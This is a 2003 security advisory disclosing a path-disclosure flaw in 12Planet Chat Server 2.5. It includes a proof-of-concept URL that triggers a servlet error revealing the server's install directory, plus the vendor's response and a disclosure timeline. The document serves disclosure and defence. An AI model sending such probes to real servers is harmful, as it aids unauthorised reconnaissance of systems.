Root directory revealing vulnerability Found in 12Planet Chat Server 2.5 http://www.12planet.com Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY 12Planet Chat Server provides advanced chat functionalities aiming to Offer discussion space for customers, partners and visitors. It addresses the demand from all web sites and intranet/extranet Portals willing to offer "sticky" services to their visitors as well As secure and reliable real-time communication to their customers. Its moderation option enables businesses to organize online chat c Conferences by inviting celebrities, experts to talk with visitors and Moderate visitor questions through a moderation process. It is possible getting the Root directory revealed by sending At specific URL request -----[AFFECTED SYSTEMS Vulnerable systems: * 12Planet Chat Server 2.5 Immune systems: * -----[SEVERITY Low - An attacker has the possibility to find the location on the server On where the Chat Server is installed. -----[DESCRIPTION OF WHAT THE VULNERABILITY IS The following transcript demonstrates a sample exploitation of the Vulnerabilities: ------------------------------------------------------------------- Anything less then 3 times /qwe then you will only get a HTTP 500 - Internal server error Proof-Of-Concept exploit: [Input in browser] http://vuln-host:8080/qwe/qwe/qwe/index.html [Output] Error: 500 Internal Servlet Error: java.io.IOException: bad path: C:\Program Files\12Planet Chat Server v2.5.1\www\qwe\qwe\qwe\index.html at java/io/File.canonPath at java/io/File.getCanonicalPath at com/sun/web/core/DefaultServlet.doGet at javax/servlet/http/HttpServlet.service at javax/servlet/http/HttpServlet.service at com/sun/web/core/ServletWrapper.handleRequest at com/sun/web/core/Context.handleRequest at com/sun/web/server/ConnectionHandler.run -------------------------------------------------------------------- -----[DETECTION 12Planet Chat Server 2.5 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[VENDOR RESPONSE Thank you for the bug report. We are currently analyzing the issues and will keep you updated on the progress. 12Planet will provide assistance to all the customers that are interested in the patch (email to : support@12planet.com) Best regards, Lei 12Planet -----[DISCLOSURE TIMELINE 21/02/2003 Found the Vulnerability. 21/02/2003 Reported to iDEFENSE 31/03/2003 Received rejection from iDEFENSE 01/04/2003 Reported to 12Planet (support@12planet.com; bugs@12planet.com; sales@12planet.com; features@12planet.com) 01/04/2003 Received response from 12Planet 11/04/2003 Public Disclosure. -----[ADDITIONAL INFORMATION The vulnerability was discovered by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.